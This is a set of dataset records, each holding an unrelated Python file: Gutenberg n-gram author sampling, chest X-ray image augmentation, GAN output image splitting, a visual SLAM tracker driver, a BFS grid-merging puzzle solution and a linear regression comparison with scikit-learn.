+{"seq_id":"351619735","text":"from sklearn.feature_extraction.text import CountVectorizer\nfrom math import floor\nimport numpy as np\nimport pandas as pd\nimport random\nimport pickle\nimport codecs\nimport csv\nimport os\n\n# CLEAN TEXT\n'''\n\npath = os.getcwd()+\"/gutenberg\"\n\ninitial_text2cut_1 = \"with this eBook or online at www.gutenberg.\"\ninitial_text2cut_2 = \"*END*THE SMALL PRINT! FOR PUBLIC DOMAIN ETEXTS*\"\n\nfinal_text2cut_1 = \"END OF THIS PROJECT GUTENBERG EBOOK\"\nfinal_text2cut_2 = \"END OF THE PROJECT GUTENBERG EBOOK\"\n\nwith open(\"gut_index.csv\", \"r\") as csv_file:\n reader = csv.DictReader(csv_file, delimiter=',')\n for book in reader:\n path_book = path[:]\n if len(book[\"id\"]) == 1:\n path_book += '/0/'+book[\"id\"]+'/'+book[\"id\"]+\".txt\"\n else:\n for i in range(len(book[\"id\"])-1):\n path_book += '/'+book[\"id\"][i]\n path_book += '/'+book[\"id\"]\n if path_book[-1] == 'C':\n path_book = path_book[:-1]\n try:\n possible_txts = os.listdir(path_book)\n if path_book.split(\"/\")[-1]+\".txt\" in possible_txts:\n path_book += \"/\"+book[\"id\"]+\".txt\"\n else:\n for possible_txt in possible_txts:\n if \".txt\" in possible_txt and not \"readme.txt\" in possible_txt:\n path_book += \"/\"+possible_txt\n break;\n except FileNotFoundError:\n pass\n\n try:\n with codecs.open(path_book, \"r\",encoding='utf-8', errors='ignore') as book_file:\n cv = CountVectorizer(min_df=2, stop_words='english',ngram_range=(5, 5), analyzer='word')\n analyzer = cv.build_tokenizer()\n\n #print(path_book)\n\n text = book_file.read()\n if initial_text2cut_1 in text:\n index_start = text.index(initial_text2cut_1)+len(initial_text2cut_1)+3\n elif initial_text2cut_2 in text:\n index_start = text.index(initial_text2cut_2)+len(initial_text2cut_2)+3\n else:\n index_start = 250\n \n if final_text2cut_1 in text:\n index_end = text.index(final_text2cut_1)\n elif final_text2cut_2 in text:\n index_end = text.index(final_text2cut_2)\n else:\n index_end = len(text)-200\n\n text = text[index_start:index_end]\n\n #print(index_start, index_end)\n \n tokens = analyzer(text)\n except FileNotFoundError as error:\n try:\n path_book = \"/\".join(path_book.split(\"/\")[:-2])+\"/\"+path_book.split(\"/\")[-1]+\"/\"+path_book.split(\"/\")[-1]+\".txt\"\n with codecs.open(path_book, \"r\",encoding='utf-8', errors='ignore') as book_file:\n cv = CountVectorizer(min_df=2, stop_words='english',ngram_range=(5, 5), analyzer='word')\n analyzer = cv.build_tokenizer()\n\n #print(path_book)\n\n text = book_file.read()\n if initial_text2cut_1 in text:\n index_start = text.index(initial_text2cut_1)+len(initial_text2cut_1)+3\n elif initial_text2cut_2 in text:\n index_start = text.index(initial_text2cut_2)+len(initial_text2cut_2)+3\n else:\n index_start = 250\n\n if final_text2cut_1 in text:\n index_end = text.index(final_text2cut_1)\n elif final_text2cut_2 in text:\n index_end = text.index(final_text2cut_2)\n else:\n index_end = len(text)-200\n \n text = text[index_start:index_end]\n #print(index_start, index_end)\n tokens = analyzer(text)\n except (IsADirectoryError, FileNotFoundError) as error:\n print(path_book+\" ERROR\")\n continue;\n except IsADirectoryError:\n continue;\n \n print(path_book+\" OK\")\n with open(os.getcwd()+\"/ngrams/\"+path_book.split(\"/\")[-1][:-4]+\".pkl\", 'wb') as f:\n pickle.dump(tokens, f)\n\n\n# CALCULATE SIMILARITY AND RANK BOOKS BY AUTHOR\n\n\ndf = pd.read_csv(os.getcwd()+\"/gut_index.csv\")\n\nbooks_by_author = df.groupby('author')\n\ncoincident_books = []\nless_coincident_books = []\ncoincident_books_list = []\n\nfor author, ids in books_by_author:\n ids = list(ids['id'])\n \n for i in range(len(ids)):\n for j in range(len(ids)):\n if i != j:\n directory_book_ref = os.getcwd()+\"/ngrams/\"+ids[i]\n directory_book_delete = os.getcwd()+\"/ngrams/\"+ids[j]\n\n if directory_book_ref[-1] == 'C':\n directory_book_ref = directory_book_ref[:-1]\n\n if directory_book_delete[-1] == 'C':\n directory_book_delete = directory_book_delete[:-1]\n try:\n with open(directory_book_ref+\".pkl\", 'rb') as book_ref:\n with open(directory_book_delete+\".pkl\", 'rb') as book_delete:\n book_ngrams = pickle.load(book_ref)\n book_possible_delete = pickle.load(book_delete)\n\n if(len(book_possible_delete)>0 and len(book_ngrams)>0):\n #max-min\n coincident_ngrams = len(set(book_ngrams).intersection(set(book_possible_delete)))/min(len(book_possible_delete), len(book_ngrams))\n coincident_books.append((author,ids[i],ids[j],coincident_ngrams))\n \n except FileNotFoundError as error:\n pass\n\n \n coincident_books.sort(key=lambda tup: tup[3])\n for i in range(len(coincident_books)):\n if(coincident_books[i][3] < 0.1):\n less_coincident_books.append(list(coincident_books[i]))\n\n if(len(less_coincident_books)>0):\n coincident_books_list += less_coincident_books\n print(ids)\n coincident_books = []\n less_coincident_books = []\n\nheaders = [\"author\",\"book1\",\"book2\",\"score\"]\ndf = pd.DataFrame(coincident_books_list, columns=headers)\n\nsum_scores = pd.pivot_table(df,index=[\"author\",\"book1\"],values=[\"score\"], aggfunc=np.sum).sort_values('score')\n\ndf.to_csv(\"book_scores_ordered.csv\", sep=',', encoding='utf-8')\n\n\n#os.remove()\n\n'''\n\ndef get_directory(book_id):\n \n path_book = os.getcwd()+\"/gutenberg\"\n\n if len(book_id) == 1:\n path_book += '/0/'+book_id+'/'+book_id+\".txt\"\n else:\n for i in range(len(book_id)-1):\n path_book += '/'+book_id[i]\n path_book += '/'+book_id\n if path_book[-1] == 'C':\n path_book = path_book[:-1]\n try:\n possible_txts = os.listdir(path_book)\n if path_book.split(\"/\")[-1]+\".txt\" in possible_txts:\n path_book += \"/\"+book_id+\".txt\"\n elif path_book.split(\"/\")[-1]+\"-0.txt\" in possible_txts:\n path_book += \"/\"+book_id+\"-0.txt\"\n elif path_book.split(\"/\")[-1]+\"-8.txt\" in possible_txts:\n path_book += \"/\"+book_id+\"-8.txt\"\n except FileNotFoundError:\n pass\n\n return path_book\n\nrandom.seed(9001)\n\n# Read scores by author\ndf = pd.read_csv(\"book_scores_ordered.csv\", sep=',')\n\n# Drop useless column\ndf.drop(['Unnamed: 0'], inplace=True, axis=1)\n\n#df_f = df.groupby(['author']).agg(['count'])\n\n# Filter authors with al least 3, 6 and 11 authors\ndf3 = df.groupby(['author']).filter(lambda x: x['book1'].nunique() > 2)\ndf6 = df.groupby(['author']).filter(lambda x: x['book1'].nunique() > 5)\ndf11 = df.groupby(['author']).filter(lambda x: x['book1'].nunique() > 10)\n\n# Sum of scores by book\ndf3_sum = pd.pivot_table(df3,index=[\"author\",\"book1\"],values=[\"score\"], aggfunc=np.sum)\ndf6_sum = pd.pivot_table(df6,index=[\"author\",\"book1\"],values=[\"score\"], aggfunc=np.sum)\ndf11_sum = pd.pivot_table(df11,index=[\"author\",\"book1\"],values=[\"score\"], aggfunc=np.sum)\n\n# Get list of all authors\ndistinct_authors_3 = np.array(df3.author.unique())\ntotal_size_3 = len(distinct_authors_3)\n\ndistinct_authors_6 = np.array(df6.author.unique())\ntotal_size_6 = len(distinct_authors_6)\n\ndistinct_authors_11 = np.array(df11.author.unique())\ntotal_size_11 = len(distinct_authors_11)\n\n\n# From the N remaining authors we take 100 randomly and iteratively until we consume the N authors. From those 100 authors,\n# we take once again 10 authors randomly which will be used to form the matrix of the model\n\n# Number of author from which 10 (selection_f) authors will be finally selected to be part of the matrix of the model\nselection_r = 100\n\n# Number of authors selected to be part of the matrix of the model\nselection_f = 10\n\n# Remaining books to select once the max/min score books are selected (2 for 3 books, 5 for 6 books and 10 for 11 books)\nremaining_f = 5\n\n# Choose size\ntotal_size = total_size_6\n\n# Choose authors size\ndistinct_authors = distinct_authors_6[:]\n\n# Number of iterations\nnum_iterations = floor(total_size/selection_r)\n\n# Lists containing the final 10 authors of all the iterations\nauthor_names_list = []\n\nprint(\"Total of {} authors\".format(total_size))\n\n# Generate 10 random indexes to select 'selection_f = 10' authors\nfor i in range(num_iterations):\n\n # take randomly selection_r indexes\n selected_authors_indexes = random.sample(range(total_size), selection_r)\n\n # get the author names associated to the indexes generated\n selected_authors_names = distinct_authors[selected_authors_indexes]\n\n # delete the author names selected from the list which contains all the author names\n distinct_authors = np.delete(distinct_authors, (selected_authors_indexes), axis=0)\n\n # reduce total size after deleting the selected names\n total_size = len(distinct_authors)\n\n # take randomly selection_f indexes out of selection_r\n selected_authors_indexes = random.sample(range(selection_r), selection_f)\n\n # get the author names associated to the indexes generated\n selected_authors_names = selected_authors_names[selected_authors_indexes]\n\n # save the 10 names selected in current iteration\n author_names_list.append(selected_authors_names)\n\n# Get the 3, 6 or 11 books from each author\n# When 3: 1-Min Known text and 2-Random for matrix, 1-Max Known text and 2-Random for matrix, 1-Random Known text and 2-Random for matrix\n# When 6: 1-Min Known text and 5-Random for matrix, 1-Max Known text and 5-Random for matrix, 1-Random Known text and 5-Random for matrix\n# When 11: 1-Min Known text and 10-Random for matrix, 1-Max Known text and 10-Random for matrix, 1-Random Known text and 10-Random for matrix\n\n'''\n# Min\nprint(\"\\n\\nMIM\\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\")\nfor i in range(len(author_names_list)):\n print(\"iteration: \"+str(i+1))\n print(\"\\n\")\n with open(\"gut_min_max_rand/size3/min/size3_min_\" +str(i+1)+ \".csv\", \"w\") as csv_file:\n writer = csv.writer(csv_file, delimiter=',')\n writer.writerow([\"author\", \"book\", \"special\", \"directory\"])\n for author in author_names_list[i]:\n print(\"________________________________________________________________________\")\n print(author+\"\\n\")\n author_df = pd.DataFrame(df3_sum.loc[author].to_records()).sort_values('score')\n\n print(\"\\nMin\")\n print(author_df.iloc[0]['book1'])\n writer.writerow([author, author_df.iloc[0]['book1'], \"True\", get_directory(author_df.iloc[0]['book1'])])\n\n author_df = author_df.drop(author_df.index[0])\n remaining_indexes = random.sample(range(len(author_df)), remaining_f)\n remaining_books = author_df.iloc[remaining_indexes]\n print(\"\\nRemaining\")\n\n for row in remaining_books.to_records():\n print(row[1])\n writer.writerow([author, row[1], \"False\", get_directory(row[1])])\n\n\n# Max\nprint(\"\\n\\nMAX\\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\")\nfor i in range(len(author_names_list)):\n print(\"iteration: \"+str(i+1))\n print(\"\\n\")\n with open(\"gut_min_max_rand/size3/max/size3_max_\" +str(i+1)+ \".csv\", \"w\") as csv_file:\n writer = csv.writer(csv_file, delimiter=',')\n writer.writerow([\"author\", \"book\", \"special\", \"directory\"])\n for author in author_names_list[i]:\n print(\"________________________________________________________________________\")\n print(author+\"\\n\")\n author_df = pd.DataFrame(df3_sum.loc[author].to_records()).sort_values('score')\n\n print(\"\\nMax\")\n print(author_df.iloc[-1]['book1'])\n writer.writerow([author, author_df.iloc[-1]['book1'], \"True\", get_directory(author_df.iloc[-1]['book1'])])\n\n author_df = author_df.drop(author_df.index[-1])\n remaining_indexes = random.sample(range(len(author_df)), remaining_f)\n remaining_books = author_df.iloc[remaining_indexes]\n print(\"\\nRemaining\")\n\n for row in remaining_books.to_records():\n print(row[1])\n writer.writerow([author, row[1], \"False\", get_directory(row[1])])\n\n'''\n# Random\nprint(\"\\n\\nRANDOM\\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\")\nfor i in range(len(author_names_list)):\n print(\"iteration: \"+str(i+1))\n print(\"\\n\")\n with open(\"gut_min_max_rand/size6/rand/size6_rand_\" +str(i+1)+ \".csv\", \"w\") as csv_file:\n writer = csv.writer(csv_file, delimiter=',')\n writer.writerow([\"author\", \"book\", \"special\", \"directory\"])\n for author in author_names_list[i]:\n print(\"________________________________________________________________________\")\n print(author+\"\\n\")\n author_df = pd.DataFrame(df6_sum.loc[author].to_records())\n\n print(author_df)\n print(\"len: \", len(author_df), \"selection_factor: \", remaining_f+1)\n remaining_indexes = random.sample(range(len(author_df)), remaining_f+1)\n remaining_books = author_df.iloc[remaining_indexes]\n\n for row in remaining_books.to_records():\n writer.writerow([author, row[1], \"False\", get_directory(row[1])])\n\n","sub_path":"gut_ngram.py","file_name":"gut_ngram.py","file_ext":"py","file_size_in_byte":14429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"294001799","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Apr 14 13:43:36 2020\r\n\r\n@author: bmsri\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport os\r\nimport cv2\r\nimport imageio\r\n\r\nfrom sklearn.utils import shuffle\r\nfrom sklearn.model_selection import train_test_split\r\nimport shutil\r\nimport matplotlib.pyplot as plt\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\n\r\nNUM_AUG_IMAGES_WANTED = 10000\r\n\r\nIMAGE_HEIGHT = 200\r\nIMAGE_WIDTH = 200\r\n\r\ntrain_image_list = os.listdir('D:\\\\PR_term_proj\\\\chest-xray-pneumonia\\\\chest_xray\\\\train')\r\n\r\ndf_train = pd.DataFrame(train_image_list, columns=['image_path'])\r\n\r\ndf_train.reset_index(inplace=True, drop=True)\r\n\r\n\r\n \r\ntrain_img_path = 'D:\\\\PR_term_proj\\\\chest-xray-pneumonia\\\\chest_xray\\\\train' \r\n\r\n\r\nbase_dir = 'base_dir'\r\nos.mkdir(base_dir)\r\n\r\ntrain_dir = os.path.join(base_dir, 'train_dir')\r\nos.mkdir(train_dir)\r\n\r\n\r\nNormal = os.path.join(train_dir, 'NORMAL')\r\nos.mkdir(Normal)\r\nPneumonia = os.path.join(train_dir, 'PNEUMONIA')\r\nos.mkdir(Pneumonia)\r\n\r\n\r\nfolder_1 = os.listdir(train_img_path)\r\n\r\ntrain_path_norm = os.path.join(train_img_path, 'NORMAL')\r\ntrain_path_pne = os.path.join(train_img_path, 'PNEUMONIA')\r\n\r\ntrain_list_norm = sorted(os.listdir(train_path_norm))\r\ntrain_list_pne = sorted(os.listdir(train_path_pne))\r\n\r\n\r\ncomp_path = 'D:\\\\PR_term_proj\\\\'\r\n\r\n#df_data.set_index('image_path', inplace=True)\r\nfrom PIL import Image\r\n\r\nfor image in train_list_norm: \r\n fname = image\r\n #label = df_data.loc[image, 'target']\r\n \r\n #if fname in folder_1:\r\n \r\n src = train_path_norm + '\\\\' + fname\r\n dst = comp_path + train_dir + '\\\\' + \"NORMAL\" + '\\\\' + fname\r\n \r\n image = Image.open(src)\r\n image=image.resize([200,200])\r\n print(np.shape(image))\r\n if (len(np.shape(image)) == 2):\r\n image.save(dst)\r\n \r\n\r\nfor image in train_list_pne: \r\n fname = image\r\n \r\n src = train_path_pne + '\\\\' + fname\r\n dst = comp_path + train_dir + '\\\\' + \"PNEUMONIA\" + '\\\\' + fname\r\n \r\n image = Image.open(src)\r\n# print(np.shape(image))\r\n image=image.resize([200,200])\r\n print(np.shape(image))\r\n if (len(np.shape(image)) == 2):\r\n image.save(dst)\r\n\r\n\r\n'''\r\nData Augmentation\r\n''' \r\naug_dir = 'aug_dir'\r\nos.mkdir(aug_dir)\r\n \r\nclass_list = ['NORMAL','PNEUMONIA']\r\n\r\nfor item in class_list:\r\n \r\n \r\n img_class = item\r\n\r\n img_list = sorted(os.listdir(comp_path + 'base_dir\\\\train_dir\\\\' + img_class))\r\n\r\n os.mkdir(aug_dir+ \"\\\\\" + item)\r\n##\r\n for fname in img_list:\r\n src = os.path.join(comp_path + 'base_dir\\\\train_dir\\\\' + img_class, fname)\r\n dst = os.path.join(aug_dir+ \"\\\\\" + item, fname)\r\n shutil.copyfile(src, dst)\r\n\r\n path = aug_dir+ \"\\\\\"# + item + \"\\\\\"\r\n save_path = comp_path + 'base_dir\\\\train_dir\\\\' + img_class\r\n\r\n datagen = ImageDataGenerator(rotation_range=40, width_shift_range=0.2, height_shift_range=0.2, shear_range=0.2, zoom_range=0.2, horizontal_flip=True)\r\n#rescale=1/255, \r\n batch_size = 50\r\n \r\n aug_datagen = datagen.flow_from_directory(path, save_to_dir=aug_dir+ \"\\\\\" + item + \"\\\\\", save_format='jpg', target_size=(IMAGE_HEIGHT,IMAGE_WIDTH), batch_size=batch_size)\r\n \r\n num_files = len(os.listdir(aug_dir+ \"\\\\\" + item))\r\n \r\n num_batches = int(np.ceil((NUM_AUG_IMAGES_WANTED-num_files)/batch_size))\r\n\r\n for i in range(0,num_batches):\r\n #imgs = Image.open(aug_datagen)\r\n imgs, labels = next(aug_datagen)\r\n print(np.shape(imgs))\r\n\r\n \r\n","sub_path":"data_gen_for_aug.py","file_name":"data_gen_for_aug.py","file_ext":"py","file_size_in_byte":3486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"275384058","text":"import scipy.misc as misc\nimport numpy as np\nimport time\nimport numpy as np\nfrom glob import glob\nimport os\nimport cv2\n\n\n\ndef resize(image,image_width):\n # image = np.int(255*image)\n image = cv2.resize(image, (image_width, image_width), interpolation=cv2.INTER_LINEAR)\n return image\n\n\ndef images_selection(file_name, image_width, image_channel, batch_size, num_generations, support_number):\n filenames = glob(os.path.join(file_name, '*.*'))\n fake_categories = len(filenames) * batch_size\n fake_images = np.zeros([fake_categories * num_generations, image_width, image_width, image_channel])\n for i,image_path in enumerate(filenames):\n store_name = file_name + '_split/'\n if not os.path.exists(store_name):\n os.mkdir(store_name)\n current_x = misc.imread(image_path)\n image_size = int(np.shape(current_x)[0]/ batch_size)\n for j in range(batch_size):\n for k in range(support_number+num_generations):\n current_iamge = current_x[image_size*j:image_size*(j+1),image_size*(k):image_size*(k+1)]\n current_iamge = resize(current_iamge,128)\n # if len(np.shape(current_iamge))<3:\n # current_iamge = np.expand_dims(current_iamge,axis=-1)\n current_name = store_name + image_path.split('/')[-1].split('png')[0] + 'batch{}_sample{}.png'.format(j,k) \n misc.imsave(current_name, current_iamge)\n\n\n\nfile_name = '/media/user/05e85ab6-e43e-4f2a-bc7b-fad887cfe312/meta_gan/MatchingGAN-SelfAttention-XS/VISUALIZATION/vggface/1shot/visual_outputs/'\nimage_width = 128\nimage_channel =3\nbatch_size = 20\nnum_generations = 60\nsupport_number = 3\nimages_selection(file_name, image_width, image_channel, batch_size, num_generations, support_number)","sub_path":"visluazation_images_selection.py","file_name":"visluazation_images_selection.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"619215589","text":"import sys\nimport os\nimport cv2\n\nfrom pysvso.py_pose_graph.mapblock import RuntimeBlock\nfrom pysvso.system_tracker.tracker import SVSOTracker, Tracker\nfrom pysvso.graphics.viewer import PCViewer\nfrom pysvso.validation_toolkit.tum import Program as GTReader\nfrom pysvso.py_parallel_tasking_sched.threadingpool import ThreadingPool\n\nfrom pysvso.lib.log import init_logging\nimport logging\n\ninit_logging()\n\nfrom pysvso.config import Settings\n\nsettings = Settings()\nprint(settings)\n\nProject_base = settings.PROJECT_ROOT\nCamera_device = settings.CAMERA_DEVICE\n\nclass System:\n\n def __init__(self):\n # construct a map block, where typically raw map data should be read from this point\n block = RuntimeBlock()\n self._block = block\n block.load_device(Camera_device)\n\n # initialize a tracker\n tracker = SVSOTracker().set_FromMap(block)\n self._tracker = tracker\n\n # reading ground truth\n # NOTE: modify \"global_settings.py\" to decide whether you want to use ground truth\n trajectories, timestamps, depth_images = GTReader()\n self._trajectories = trajectories\n self._timestamps = timestamps\n self._depth_images = depth_images\n\n # set ground truth we loaded before\n tracker.trajectories_gt = trajectories\n\n # set depth images\n tracker.depth_images = depth_images\n\n # viewer\n self._legacy_viewer = None\n\n self._viewer = PCViewer()\n viewer = self._viewer\n\n viewer.set_FromTracker(tracker)\n viewer.set_FromMap(block)\n # viewer.Init()\n # Pycharm has some problems to run this snippet of codes\n viewer.Start()\n print(\"[Main Thread] viewer: \", viewer)\n print(\"\\n\\n\")\n pass\n\n def run(self):\n tracker = self._tracker\n timestamps = self._timestamps\n viewer = self._viewer\n\n DRAW_ONCE = False\n\n # ORBSLAM2 first successfully triangulated frame no: #91\n\n SAVER = settings.SAVER\n if not os.path.isdir(SAVER):\n os.makedirs(SAVER)\n\n # allocating system resources\n pool = ThreadingPool(5)\n\n # pool.add_task(viewer.Start)\n\n # experiments controls\n cnt = 0 # total frames seq\n cnt0 = 0 # tracked frames seq\n\n START_FRAMES = 0\n STOP_FRAMES = 500\n TRACKED_FRAMES = 400\n\n STEP = 5\n\n P1 = START_FRAMES\n P2 = START_FRAMES + 3 * STEP # 3\n P3 = START_FRAMES + 50 * STEP # 50\n\n capture = cv2.VideoCapture(os.path.join(settings.VIDEO_DIR, settings.VIDEO_NAME))\n\n while True:\n ret, frame = capture.read()\n if not ret:\n break\n\n timestamp = float(timestamps[cnt][0])\n file_name = timestamps[cnt][1]\n\n cnt += 1\n if cnt % STEP != 1:\n # comment this line if you want track images continuously\n pass\n # continue\n\n if cnt < START_FRAMES:\n continue\n\n # Relocalization control\n if cnt > P2 and cnt < P3:\n # creating missing gaps\n logging.info(\"skiping seqences from %d to %d, cur %d\" % (\n P2, P3, cnt\n ))\n continue\n\n # Trigger relocalization mode\n if cnt == P3:\n logging.info(\"manually switch state\")\n tracker.state = Tracker.State.LOSTED\n DRAW_ONCE = False\n # store the legacy\n self._legacy_viewer = viewer\n # create a new viewer\n self._viewer = PCViewer()\n viewer = self._viewer\n viewer.set_FromTracker(tracker)\n viewer.set_FromMap(tracker._map)\n # viewer.Init()\n # Pycharm has some problems to run this snippet of codes\n viewer.Start()\n\n # the tracker is in relocalization mode and not initialized\n if tracker._is_relocalization_mode and not tracker.isInitialized():\n # I don't wan to use a new map here\n viewer.set_FromMap(tracker._map)\n pass\n\n # @todo : TODO fix encoding error\n logging.info(\"exec tracker to track motions: %d\" % cnt)\n # Hybrid of OpticalFlow and Kalman Filter predictor & deep features based Hungarian algorithm implementation, Updated on Feb 26 2020 by Author Lei Wang\n tracker.track(frame, timestamp=timestamp)\n cnt0 += 1\n\n if tracker.cur is None: # relocalization triggered!\n continue\n\n ### Deprecated codes, in favor of new implementation of WebImagaRenderer ###\n # offline task\n if tracker.cur is not None and (\n not hasattr(tracker.cur, \"rendered_img\") or tracker.cur.rendered_img is None):\n logging.info(\"skipping rendered_img at Frame#%d ...\" % tracker.cur.seq)\n continue\n\n if not tracker.cur.is_First and tracker.cur.isKeyFrame:\n if tracker.cur.depth_img is not None and not DRAW_ONCE:\n viewer.drawDepthImage(tracker.cur)\n DRAW_ONCE = True\n logging.info(\"Scheduling task of updating point cloud viewer at KeyFrame %s\" % tracker.cur)\n\n def update_map(cv, cur=None, last=None, flow_mask=None, active_frames=None):\n with cv:\n logging.info(\"Waiting for completion of updating map ...\")\n cv.wait_for(\n lambda: tracker._map.complete_updating) # awaken by local mapper, and check complete_updating variable\n logging.info(\"Updating ...\")\n viewer.Update(cur=cur, last=last, flow_mask=flow_mask, active_frames=active_frames)\n logging.info(\"Point cloud viewer updated at KeyFrame %s\" % tracker.cur)\n tracker._map.complete_updating = False\n\n if not pool.tasks.full():\n pool.add_task(update_map, tracker._map.update_map_condition,\n cur=tracker.cur, last=tracker.last_frame, flow_mask=tracker.flow_mask,\n active_frames=tracker._map.get_active_frames())\n else:\n logging.info(\"Tasks are full. Cannot push tasks into the pool.\")\n\n if not tracker.cur.is_First and not tracker.cur.isKeyFrame:\n # update pose\n viewer.Update()\n pass\n\n # rets = model.detect([tracker.last_frame.img], verbose=1)\n # r = rets[0]\n # visualize.display_instances(frame, r['rois'], r['masks'], r['class_ids'], class_names, r['scores'])\n # out_frame = save_instances(tracker.last_frame.img, r['rois'], r['masks'], r['class_ids'], class_names, r['scores'])\n\n name = os.path.join(settings.SAVER, \"images/{}.jpg\".format(cnt))\n if tracker.last_frame is None or not hasattr(tracker.last_frame,\n \"rendered_img\") or tracker.last_frame.rendered_img is None:\n out_frame = tracker.cur.rendered_img\n else:\n out_frame = cv2.add(tracker.last_frame.rendered_img, tracker.flow_mask)\n cv2.imwrite(name, out_frame)\n\n if cnt >= STOP_FRAMES:\n logging.info(\"break after %d frames\" % STOP_FRAMES)\n break\n\n if cnt0 >= TRACKED_FRAMES:\n logging.info(\"break after %d frames tracked\" % TRACKED_FRAMES)\n break\n\n if tracker.isInitialized():\n continue\n\n logging.info(\"complete reading video.\")\n capture.release()\n # viewer.Stop()\n pass\n\n\nif __name__ == \"__main__\":\n system = System()\n system.run()","sub_path":"python/pysvso/system_tracker/system.py","file_name":"system.py","file_ext":"py","file_size_in_byte":7968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"154882531","text":"from collections import deque\n\n# 변수 선언 및 입력\nn, L, R = tuple(map(int, input().split()))\n\negg = [\n list(map(int, input().split()))\n for _ in range(n)\n]\n\nbfs_q = deque()\negg_group = []\nvisited = [\n [False for _ in range(n)]\n for _ in range(n)\n]\n\n\ndef in_range(x, y):\n return 0 <= x and x < n and 0 <= y and y < n\n\n\ndef can_go(x, y, curr_egg):\n if not in_range(x, y):\n return False\n\n egg_diff = abs(egg[x][y] - curr_egg)\n return not visited[x][y] \\\n and L <= egg_diff and egg_diff <= R\n\n\n# visited 배열을 초기화 해줍니다.\ndef initialize_visited():\n for i in range(n):\n for j in range(n):\n visited[i][j] = False\n\n\ndef bfs():\n dxs, dys = [0, 1, 0, -1], [1, 0, -1, 0]\n\n # BFS 탐색을 수행합니다.\n while bfs_q:\n curr_x, curr_y = bfs_q.popleft()\n\n for dx, dy in zip(dxs, dys):\n new_x, new_y = curr_x + dx, curr_y + dy\n\n # L, R 사이인 경우에만 합쳐질 수 있습니다.\n if can_go(new_x, new_y, egg[curr_x][curr_y]):\n bfs_q.append((new_x, new_y))\n egg_group.append((new_x, new_y))\n visited[new_x][new_y] = True\n\n\n# 계란들을 합칩니다.\ndef merge_eggs():\n sum_of_eggs = sum([\n egg[x][y]\n for x, y in egg_group\n ])\n\n for x, y in egg_group:\n egg[x][y] = sum_of_eggs // len(egg_group)\n\n\n# 조건에 맞게 계란의 양을 바꿔줍니다.\ndef move_eggs():\n global egg_group\n\n # BFS 탐색을 위한 초기화 작업을 수행합니다.\n initialize_visited()\n\n is_changed = False\n\n # 아직 방문하지 못한 칸에 대해\n # BFS 탐색을 통해 합쳐질 계란들을 찾아냅니다.\n for i in range(n):\n for j in range(n):\n if not visited[i][j]:\n # 합쳐질 계란 목록을 담을 곳을 초기화합니다.\n egg_group = []\n\n bfs_q.append((i, j))\n egg_group.append((i, j))\n visited[i][j] = True\n\n bfs()\n\n # 계란의 이동이 한번이라도 일어났는지를 확인합니다.\n if len(egg_group) > 1:\n is_changed = True\n\n # (i, j)와 관련이 있는 계란들을 합칩니다.\n merge_eggs()\n\n return is_changed\n\n\nmove_cnt = 0\n\n# 이동이 더 이상 필요 없을 때까지\n# 계란의 이동을 반복합니다.\nwhile True:\n is_changed = move_eggs()\n if not is_changed:\n break\n\n move_cnt += 1\n\nprint(move_cnt)\n","sub_path":"samsung/11/17 토스트 계란틀/33.py","file_name":"33.py","file_ext":"py","file_size_in_byte":2574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"640850017","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 29 23:50:57 2021\n\n@author: Aditya Mishra\n\"\"\"\n\n# Necessary Libraries\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.datasets import load_diabetes\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LinearRegression as Sk_linear_reg\nfrom sklearn.metrics import mean_squared_error\nfrom my_linear_model import LinearRegression\n\n# Dataset\ndata = load_diabetes()\ndf = pd.DataFrame(data.data, columns=data.feature_names)\ndf['target'] = data.target\nprint('Describe Dataset\\n', df.describe())\n\n# Model\nepoch = 10_000\nmy_clf = LinearRegression(max_iter=epoch, optimizer='bgd')\nreg_clf = Sk_linear_reg()\n\nx_train, x_test, y_train, y_test = train_test_split(df.drop(['target'], axis=1), df['target'], test_size=0.3)\nmy_clf.fit(x_train, y_train)\nreg_clf.fit(x_train, y_train)\n\nmy_pred = my_clf.predict(x_test)\nreg_pred = reg_clf.predict(x_test)\n\n# Model Test Result\nprint(f\"My Model's MSE: {my_clf.mse(y_test, my_pred):.3f}\")\nprint(f\"Sklearn Model's MSE: {mean_squared_error(y_test, reg_pred):.3f}\")\n\n# Error Plot\nplt.title(\"Error in K-epochs\")\nplt.plot(range(epoch), my_clf.error_, 'r-')\nplt.xlabel('Epochs')\nplt.ylabel('Error')\nplt.show()\n","sub_path":"driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
